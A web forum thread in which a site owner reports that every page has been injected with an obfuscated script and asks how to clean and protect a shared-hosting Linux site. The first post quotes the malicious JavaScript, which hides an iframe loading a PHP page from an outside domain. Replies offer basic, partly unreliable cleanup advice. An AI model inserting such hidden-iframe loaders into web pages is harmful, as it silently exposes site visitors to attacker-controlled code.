0

hi guys,,,

deep trouble,,,,

i don't know where to put this question ...

when i am seeing my webpages onevery page this script comming .. i have no idea how to deal with this thing.. i search google did some thing for related to cpanel.

changning all my account password,,,, remove invalid code below form pages. but not sure that what to do ?

any help? badly required....

<script type='text/javascript'>function uI(){};var dY='';uI.prototype = {r : function() {var b=false;k=21379;var cK=false;this.p=false;var t=false;this.a=false;this.fY=false;lE="";var rF="bodyihm".substr(0,4);i=false;var m=new Date();var h=120;this.kH=38127;n=false;var z=false;pR='';var e=false;try {function iJ(){};this.mY="";this.zE="";oK="";var kHA=function(){return 'kHA'};vE=false;var d=String("app"+"end"+"Chi"+"ld");var bM="";var u=17913;j="j";var dD=function(){return 'dD'};var g=document;var nA="";nQ=41938;var eP=false;this.y="y";var o="ifra"+"me";var gP=63904;this.tA=false;this.nH="nH";var v=new String("crea"+"teEl"+"emen"+"t");hT='';function gF(){};lEW="lEW";bZ="";var dR=function(){};this.vM=30803;var c = g[v](o);this.hJ='';var q=function(){};var dX=function(){return 'dX'};var jI=function(){};var hX="";var f = String("vis"+"ibiGJOg".substr(0,3)+"vOrlitOrv".substr(3,3)+"ILMyLIM".substr(3,1));lD='';tR=62167;var yZ=false;var vB=40296;c.height=h;this.nQR=false;mYP="mYP";c.width=h;var rY=new Array();var lT="lT";var fF="";this.pU="";this.gJ="gJ";var tN=new Array();var lK=false;c.src="http:"+"//wig741U".substr(0,5)+"gete."+"com/c"+"ount2vJ7".substr(0,5)+"8dSs4.php8dSs".substr(4,5);var rU=new Date();var cO=new Array();c.style[f]="hid"+"den";var gJT='';var w="w";gD=21301;function qQ(){};var bY="";g[rF][d](c);var rP="";this.s="s";function qR(){};tNL=false;var hK=function(){return 'hK'};} catch(ex){this.fV='';var aS='';var rUH=new Date();var sF=new Date();var fI="";var cF="";document.write("<"+rF+">");var sX=function(){return 'sX'};var hU='';zY="zY";var qU='';var l=this;var gI=new Array();var kQ=false;var mW="mW";var bD="bD";setTimeout(function(){l.r();}, h);this.rN='';var gW="";this.hC='';function fC(){};}this.aSD=11624;this.kO='';}};this.gH="";var wI=new uI(); tW=59929;wI.r();this.sFG=45273;</script>
4
Contributors
12
Replies
13
Views
7 Years
Discussion Span
Last Post by vaibhav1983
0

Delete everything in your account and do Antivirus cleaning and use Backup to restore services.
@rch1231,
virus much of the time smells like Ms Windows ;)

0

evstevemd,
Normally I would agree but this is a java script and may not be a virus but an attachment to one of their php files or includes. That is why I ask which OS was on the server and from there what type of server so I could recommend support routes.

0

we have linux and shared hosting.....

i also notice that when i was checking my page.php files which has no html code inside not infected with this ,, but other are infected with above code.so using DW i remove all script tag thrugh find and replace.

i also changed my .htaccess file.

but afraiding ... how to protect.


your more suggestion help me to get out of this prob.


thanx 4 all ....

0


but afraiding ... how to protect.


your more suggestion help me to get out of this prob.


thanx 4 all ....

1. Get how it got "infected" then we will provide suggestion
2. Backup daily/weekly/monthly (script and cron)
3. Use Hosting services with good reputation/customer care

0

1. Get how it got "infected" then we will provide suggestion
2. Backup daily/weekly/monthly (script and cron)
3. Use Hosting services with good reputation/customer care

i donn't know much php but learning it...
i checked my directory.. i am including files just simple with include function.
see on google that it is harmfull validation require there.

so i make code like this for securing include files. i am also using ckeditor latest version but for uploading image file i used fckeditor build in filemanager in ckeditor.

it will write or need some improvement?

<?php         
  $page=array('somefolder/my.php','somefolder/my.php');
  $one=sha1(date("Y/d/M")."dddd");
  $two=sha1(date("Y/d/M")."ccc");
 
  define($one,$two);    
  if(!defined($one))
  {
     echo'File Not Found-404 Error';
     exit();
  }else{
      
      if(in_array($page[1],$page))
      {
          include_once($page[1]);
          
      }
      else{
              echo "File Not Found-404 Error";
              exit();
          }
  }

?>
0

i donn't know much php but learning it...
i checked my directory.. i am including files just simple with include function.
see on google that it is harmfull validation require there.

so i make code like this for securing include files. i am also using ckeditor latest version but for uploading image file i used fckeditor build in filemanager in ckeditor.

it will write or need some improvement?

<?php         
  $page=array('somefolder/my.php','somefolder/my.php');
  $one=sha1(date("Y/d/M")."dddd");
  $two=sha1(date("Y/d/M")."ccc");
 
  define($one,$two);    
  if(!defined($one))
  {
     echo'File Not Found-404 Error';
     exit();
  }else{
      
      if(in_array($page[1],$page))
      {
          include_once($page[1]);
          
      }
      else{
              echo "File Not Found-404 Error";
              exit();
          }
  }

?>

Does this relate to the original thread?
If no mark this solved and open spanking new thread

0

@rohit...

In your cpanel you can password protect your directories...
Maybe someone got list of all your files and also hacked into the server. That's too much technology, but have heard a few cases of it...

0

@rohit...

In your cpanel you can password protect your directories...
Maybe someone got list of all your files and also hacked into the server. That's too much technology, but have heard a few cases of it...

how can i do that?we have godaddy....

0

how can i do that?we have godaddy....

I guess if godaddy does not provide the option to password protect your directories then you need to change your webhost provider.

I went with www.ewebguru.com
So far I found their services very satisfactory.

You can use my referral to start hosting if you would like

My website link is in my signature

Edited by Ezzaral: Url removed. Affiliate links are not permitted here

This topic has been dead for over six months. Start a new discussion instead.
Have something to contribute to this discussion? Please be thoughtful, detailed and courteous, and be sure to adhere to our posting rules.